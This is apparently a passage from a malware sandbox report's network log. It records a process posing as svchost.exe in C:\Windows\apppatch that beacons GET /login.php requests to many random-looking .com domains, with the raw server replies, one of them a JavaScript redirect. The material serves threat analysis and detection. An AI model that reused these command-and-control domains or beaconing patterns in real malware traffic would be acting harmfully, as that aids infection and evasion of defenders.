                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygyvuj.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.922024012 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:45 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=71b686a014dcaa81f183649cefd9ae02|8.46.123.33|1725785625|1725785625|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          34192.168.2.96331144.221.84.105801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.527384043 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyhiz.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:49.707879066 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:49 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=3f3c1b31aa98ee6068ede01a84152478|8.46.123.33|1725785629|1725785629|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          35192.168.2.95733469.162.80.55801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.268870115 CEST293OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyfyj.com
                                                                                                                                                                                                          Cookie: sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.790457964 CEST772INHTTP/1.1 200 OK
                                                                                                                                                                                                          accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          content-length: 481
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          date: Sun, 08 Sep 2024 08:53:52 GMT
                                                                                                                                                                                                          server: nginx
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 54 63 35 4d 6a 67 7a 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 31 4e 7a 67 31 4e 6a 4d 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6e 42 71 61 47 39 30 5a 44 67 77 4f 54 51 78 5a 32 4a 68 61 44 51 78 5a 47 6c 30 5a 54 6b 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 55 33 4f 44 55 32 4d 7a [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc5MjgzMiwiaWF0IjoxNzI1Nzg1NjMyLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqaG90ZDgwOTQxZ2JhaDQxZGl0ZTkiLCJuYmYiOjE3MjU3ODU2MzIsInRzIjoxNzI1Nzg1NjMyNzI4MzYwfQ.LG1EzBfX1ECbJXMCgcf9aj9iS9_3pAa-hmXKPDIsKPc&sid=b166d882-6dbf-11ef-90a1-9c5e8dd41795');</script></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          36192.168.2.957335199.191.50.83801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.269407988 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: galyqaz.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          37192.168.2.9573363.64.163.50801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.312402964 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          38192.168.2.957338208.100.26.245801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.326431990 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.818684101 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:52 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.852519989 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.970581055 CEST744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:52 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          39192.168.2.957339188.114.96.3801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.329917908 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.532174110 CEST787INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oewMEPCko3g4tmSchmNkX6g879LSK9ycWCk4UZj6EFC3WuxDeJmJe9KoyeVkd2ewLK2PbhNlp%2B0x0xiL1AMWcUFPrCShybZQFLhwClpSTEzrDNDmDxnEhEp8g1ZDEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5ec8ea15e82-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Sep 8, 2024 10:53:55.452831984 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:56.261188984 CEST797INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:56 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://qegyhig.com/login.php
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwTxBm%2Bp8Bm%2Bi9jwmdKg5lymp0LxSVjlaG2Ov9H8ClooMC8QH3BEViKW%2F4E%2BMKLCoCzuLLtFNu2hr5p47YGvPAh65dJPOSGpVL%2B1M6u7ykDLtsjo%2FWZViKCNJNIRiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb5fde8d25e82-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          40192.168.2.9573403.64.163.5080
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.333750963 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.964428902 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:52 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.979569912 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.166145086 CEST689INHTTP/1.1 410 Gone
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 542
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          41192.168.2.957337154.212.231.82801512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Sep 8, 2024 10:53:52.340037107 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.286087036 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:53 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                          Sep 8, 2024 10:53:53.979286909 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyniw.com
                                                                                                                                                                                                          Sep 8, 2024 10:53:54.373919964 CEST696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:53:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                          Connection: keep-alive
